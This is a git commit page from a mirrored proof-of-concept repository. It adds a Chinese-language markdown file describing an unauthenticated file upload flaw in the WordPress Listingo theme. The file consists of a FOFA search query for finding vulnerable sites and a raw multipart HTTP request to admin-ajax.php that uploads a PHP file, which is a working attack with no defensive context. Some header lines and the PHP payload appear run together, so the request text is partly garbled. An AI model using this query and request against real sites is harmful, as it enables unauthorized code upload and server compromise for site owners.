mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Create wordpress listingo 文件上传漏洞.md
This commit is contained in:
parent
15621e4f11
commit
58d044acf8
27
wordpress listingo 文件上传漏洞.md
Normal file
27
wordpress listingo 文件上传漏洞.md
Normal file
@ -0,0 +1,27 @@
|
||||
## wordpress listingo 文件上传漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="wp-content/themes/listingo"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1
|
||||
Host: targetUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8rVjnfcgxgKoytcgAccept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Content-Length: 531
|
||||
|
||||
------WebKitFormBoundary8rVjnfcgxgKoytcg
|
||||
Content-Disposition: form-data; name="listingo_uploader";filename="1008.php"
|
||||
Content-Type:text/php
|
||||
|
||||
<?phpphpinfo();?>
|
||||
------WebKitFormBoundary8rVjnfcgxgKoytcg
|
||||
Content-Disposition: form-data; name="submit"
|
||||
|
||||
Start Uploader
|
||||
------WebKitFormBoundary8rVjnfcgxgKoytcg--
|
||||
```
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user